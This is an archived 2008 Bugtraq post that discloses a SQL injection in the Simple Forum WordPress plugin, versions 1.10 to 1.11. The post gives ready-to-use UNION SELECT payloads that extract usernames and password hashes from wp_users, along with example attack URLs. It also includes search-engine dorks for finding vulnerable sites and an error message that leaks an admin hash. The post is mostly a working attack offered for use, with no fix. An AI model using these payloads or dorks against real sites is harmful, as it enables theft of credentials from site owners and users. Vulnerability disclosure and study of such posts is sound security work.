Simple Forum Version 1.10-1.11 SQL Injection

---

• From: hackturkiye.hackturkiye@xxxxxxxxx
• Date: 15 Feb 2008 17:40:20 -0000

---

###############################################################
#
# Simple Forum Version 1.10-1.11 SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@xxxxxxxxx
#
################################################################
Simple Forum - Version 1.10

Simple Forum - Version 1.10 - ( 2.1.3)

Simple Forum - Version 1.11

################################################################

EXPLAİN=

sametimes password and username in error massege for axample you can see in

(bazen şifreler hataların içindedir)

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '|admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**' at line 1]
UPDATE wp_sftopics SET topic_opened = |admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

################################################################

DORK 1 :

Simple Forum - Version 1.10
Simple Forum - Version 1.10 - ( 2.1.3)
Simple Forum - Version 1.11

DORK 2 : allinurl: topic "forums?forum="

################################################################
example

http://xxxxx/forums?forum=xxxx&topic= (expliot)

EXPLOİT 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

EXPLOİT 2 :

SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number)

example

www.xxxxx/forums?forum=1(expliot)

&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*


################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################

---

• Prev by Date: SellOwnHouse login SQL Injection
• Next by Date: Re: Apache web server 2.2: htpasswd predictable salt weakness
• Previous by thread: SellOwnHouse login SQL Injection
• Next by thread: [ MDVSA-2008:045 ] - Updated MPlayer packages fix a few vulnerabilities
• Index(es):
  • Date
  • Thread

---

Relevant Pages CA Forum Remote SQL Injection ... CAForum 1.0 Remote SQL Injection - ... CodeAvalanche Forum Version 1.0 ... CodeAvalanche FreeForum is asp forum application which allows free posting, there is no needs for registration of your ... In the file default.asp in Admin directory is vulnerable to an Remote SQL Injection Attack. ... (Bugtraq) [waraxe-2008-SA#069] - Multiple Sql Injection in vBulletin 3.7.4 ... vBulletin is a professional, affordable community forum solution. ... As result sql injection is possible. ... This results with error message from vBulletin: ... (Bugtraq) Snitz2000 SQL Injection: A user can gain admin level ... # Last bug report in 2007-02-16 with 4692 visitors ... A user can gain admin level in the forum and can access to the forum. ... It is because of a SQL Injection in "Active.asp" ... (Bugtraq) Fusetalk SQL injection submission. ... I have found sql injection in FuseTalk 2.0 during a legitmate audit. ... have exchanged emails with rkeith@xxxxxxxxxxxxxxxxx who needed more ... Direct SQL queries can occur to grab entire database ... The seems to have been a problem accessing the forum which you are ... (Bugtraq) Re: Top Ten PHP Security Issues, a preliminary list ... such as security against SQL injection need to be ... because people might wanna run a forum about SQL ... (comp.lang.php)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2008-02